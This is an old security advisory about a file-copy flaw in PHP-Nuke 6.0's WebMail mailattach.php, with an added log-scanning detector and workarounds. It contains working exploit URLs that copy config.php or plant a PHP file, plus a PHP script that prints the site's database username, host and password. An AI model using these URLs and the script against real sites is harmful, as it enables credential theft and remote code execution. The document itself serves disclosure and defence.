21st Jan 2003 [SBWID-5940]
COMMAND
PHP-Nuke allows remote copy of arbitrary files
SYSTEMS AFFECTED
PHP-nuke 6.0 with WebMail 0.9.3 is confirmed vulnerable
PROBLEM
Karol Więsek [appelast-at-bsquad.sm.pl] found :
--snip--
A remote attacker could transfer his own file to the server or copy an
arbitrary file from the system to an accessible directory. The result of
such acts could be remote execution of commands under the privileges of
the httpd server, or retrieving important information such as the
database login and password. The attacker does not even have to be a
registered user to make an attack, but needs a writable directory.
The crux of the problem lies in the WebMail module, and exactly in the
mailattach.php file. This module is attached to PHP-Nuke 6.0 (current)
by default. And this module does not even have to be active to make an
attack successful, because it can be accessed directly (no modules.php
in $PHP_SELF check present in this file).
Snip from mailattach.php:
if (isset($userfile) AND $userfile != "none") {
    if (ini_get(file_uploads) AND $attachments == 1) {
        $updir = "tmp";
        // $userfile and $userfile_name arrive straight from the request (register_globals);
        // neither is checked against the real upload, so any readable file is copied anywhere.
        @copy($userfile, "$updir/$userfile_name");
    }
}
A sample attack which allows an attacker to grab the database password
and login:
http://target.server/modules/WebMail/mailattach.php?userfile=../../config.php&userfile_name=../attachments/file.txt&attachments=1
Using mailattach.php an attacker could upload a file with any extension,
which allows him to upload any .php file and execute arbitrary PHP code.
To successfully exploit this vulnerability a writable directory is
needed. When the module is active, the tmp and attachments directories
should be writable to allow the module to work properly.
ANALYSIS
========
Remote exploitation allows an attacker to execute arbitrary commands
and code under the privileges of the web server. This also opens the
door to privilege escalation attacks. An attacker could also debug httpd
child processes and grab secret information like users' POP3 passwords
used for authentication to the remote POP3 server in the WebMail module.
Having the database password, he also has access to all information
about users.
Update (02 March 2003)
======================
Lorenzo Hernandez Garcia-Hierro [[email protected]]
[http://novappc.com] adds :
CODE:
http://NUKESITE/modules/WebMail/mailattach.php?%20userfile=[DIR TO PHP FILE]&userfile_name=../attachments/h4ckz.php&attachments=1
DESCRIPTION:
[DIR TO PHP FILE]:
This is the directory of your PHP file that prints the content of the
variables in config.php; the code of the file is:
<?php
// Pull the PHP-Nuke database settings into scope, then print them.
include ("../../config.php");
echo 'DB User:',"$dbuname";
echo '<br><br>';
echo 'Host for Fuck:',"$dbhost";
echo '<br><br>';
echo 'Password:',"$dbpass";
echo '<br><br>';
echo 'Thats all folks my little fucker';
?>
This file loads the variables from config.php into the h4ckz.php file and
prints all the content of the variables using the echo function of PHP.
You only have to access the temporary file on the server in the directory
that you put in the &userfile_name of the exploit URL.
WHAT CAN HAPPEN?
All the passwords of config.php are given; the attacker can use them
to modify, rename or DELETE the database, depending on the privileges
and the situation of the web admin tool, like phpnuke, and the access
configuration of the database (accept TCP/IP connections or not).
DOES IT ONLY AFFECT WEBMAIL?
No, all the modules that upload files can be unsafe, because you can
modify the variables of the exploit URL to run against another module
that uploads files.
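The two request shapes shown above (the sample URL against mailattach.php and the same parameters aimed at any other upload module) can be spotted in web-server access logs. The following Python script is an added example, not part of the advisory or of PHP-Nuke: the log lines are constructed for the demo, and the list of "executable" extensions is an assumption about the server configuration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access-log lines (demo input, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jan/2003:10:00:01 +0000] "GET /modules/WebMail/mailattach.php?userfile=../../config.php&userfile_name=../attachments/file.txt&attachments=1 HTTP/1.0" 200 312 "-" "Mozilla/4.0"
10.0.0.6 - - [21/Jan/2003:10:00:02 +0000] "GET /modules/WebMail/mailattach.php?%20userfile=/tmp/x.php&userfile_name=../attachments/h4ckz.php&attachments=1 HTTP/1.0" 200 88 "-" "Mozilla/4.0"
10.0.0.7 - - [21/Jan/2003:10:00:03 +0000] "GET /modules.php?name=WebMail&file=index HTTP/1.0" 200 4102 "-" "Mozilla/4.0"
10.0.0.8 - - [21/Jan/2003:10:00:04 +0000] "GET /modules/Other/upload.php?userfile=..%2F..%2Fconfig.php&userfile_name=x.txt HTTP/1.0" 200 10 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
EXEC_EXT = (".php", ".php3", ".phtml", ".inc")  # assumed: what this web server executes

def _traverses(value):
    # True when a decoded value is absolute or contains a ".." path segment.
    parts = value.replace("\\", "/").split("/")
    return value.startswith("/") or ".." in parts

def analyze_request(target):
    """Return the reasons a request target looks like the mailattach.php copy abuse."""
    url = urlsplit(target)
    # parse_qs percent-decodes names and values; strip names so "%20userfile" still matches.
    params = {k.strip(): v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    reasons = []
    if "userfile" not in params or "userfile_name" not in params:
        return reasons
    # A module script under /modules/ reached directly, bypassing modules.php.
    if re.match(r"^/modules/[^/]+/.+\.php$", url.path):
        reasons.append("direct module access with userfile/userfile_name")
    if _traverses(params["userfile"]):
        reasons.append("userfile escapes the upload directory (arbitrary source)")
    if _traverses(params["userfile_name"]):
        reasons.append("userfile_name escapes the tmp directory (arbitrary destination)")
    if params["userfile_name"].lower().endswith(EXEC_EXT):
        reasons.append("destination has an executable extension")
    return reasons

def scan_log(text):
    """Return (client_ip, request_target, reasons) for every suspicious log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        reasons = analyze_request(m.group(2)) if m else []
        if reasons:
            hits.append((m.group(1), m.group(2), reasons))
    return hits
```

Only GET requests carry the parameters in the access log; the module's normal POST uploads would need the request body (or a web application firewall) to apply the same checks.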
SOLUTION
Workaround
==========
As suggested by Lorenzo Hernandez Garcia-Hierro :
FIRST: Modify the code of all the files that upload files, of course, to
die when the file is called remotely (QUERY_STRING remote and REFERER
remote); you can find more info about this in the modules.php file.
SECOND: Be sure (optional) that PHP-Nuke does not use a root user for
the database.
THIRD: Modify the mysql/postgres/etc. config to only accept connections
from localhost, and the web admin apps like php admin (on remote servers)
can't run with your server ;-)
FOURTH: Activate only the modules that you use, Xd.